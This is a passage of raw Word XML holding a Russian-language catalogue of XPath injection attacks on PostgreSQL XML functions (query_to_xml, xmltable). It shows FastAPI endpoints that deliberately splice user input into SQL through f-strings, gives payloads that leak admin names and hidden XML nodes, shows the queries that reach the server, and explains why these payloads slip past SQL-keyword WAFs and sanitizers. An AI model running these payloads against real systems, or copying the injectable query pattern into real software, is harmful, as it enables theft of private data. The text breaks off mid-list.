    <w:p w14:paraId="77F3B846" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-колонок в схеме нет, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен (PUBLIC) — можно создать XML на лету и сразу XPath-выполнить:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF148BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: эндпоинт, который ищет в metadata через XPath:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52808FD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B1DBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search(name_xpath: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050FEC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT xpath('{name_xpath}', query_to_xml('SELECT id, name FROM users', true, false, '')) ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B02B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB31771"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67972D67" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name_xpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ждёт фиксированный SELECT. Но если атакующий может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>через UNION или другой injection-канал</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> заменить аргумент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>, он получает прямой leak любой таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB5C33A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name_xpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для extraction password_hash через side-channel — но xpath не может выполнить SQL, поэтому здесь только leak уже-сериализованного XML):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310F56BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//row[contains(name, 'admin')]/name/text()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347FAC96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210CD01C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT xpath('//row[contains(name, ''admin'')]/name/text()',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03987EF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             query_to_xml('SELECT id, name FROM users', true, false, ''))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4AA2F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XPath фильтрует rows where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contains 'admin' — leak admin-имён через XPath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659C4A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Замена SELECT внутри query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует другой injection-точки (например, через 3.1 UNION + 3.8.5 mass dump combo). Сама 3.11.3 — про XPath-инъекцию над XML, не про SQL-injection в query_to_xml-аргумент. Граница: 3.11.3 атакует XPath; 3.8.5 атакует SQL-аргумент.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA10FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload D — xmltable с computed-path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA76FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmltable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наиболее мощная XML-функция PG, позволяет извлекать множество значений за один проход:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56433015" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98789B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT name, age FROM xmltable(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7657D07C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        '{root_xpath}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E620C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        PASSING xml_content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148361C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        COLUMNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A1A8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            name text PATH 'name',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E99394" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            age int PATH 'age'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF4E03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F09A3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM documents WHERE id = :id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4359E522" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8346C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root_xpath</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C002BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C357E33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B374232" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT name, age FROM xmltable(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F33F92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    '//*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDAA1D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    PASSING xml_content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FEB8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    COLUMNS name text PATH 'name', age int PATH 'age'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C8BBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809B3BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM documents WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274150F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>//*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> итерирует по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всем</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> элементам XML (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;private&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); для каждого пытается извлечь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r>
        <w:t>. Утечка скрытых XML-нод.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB345A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A40B69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — direct leak любых XML-нод; обход application-логики "разрешён только /public/*".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D565CCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — blind leak через xpath_exists boolean oracle; посимвольный extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45327A37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — leak rows таблицы через query_to_xml + XPath-фильтр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C87643D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — массовый dump XML-структуры через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в xmltable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D48A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B784BD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF на SQL-keywords</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не покрывает XPath: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[contains(...)]</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starts-with(...)</w:t>
      </w:r>
      <w:r>
        <w:t>. Это другой язык.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61023A8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF на SQL-операторы (`'`, `=`, `OR`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> частично применим — XPath использует те же символы, но другая семантика. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'OR'1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в XPath — синтаксис-ошибка, не tautology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8CAC41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer на «опасные имена таблиц»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не покрывает XML-теги (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;private&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;ssn&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B91794" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
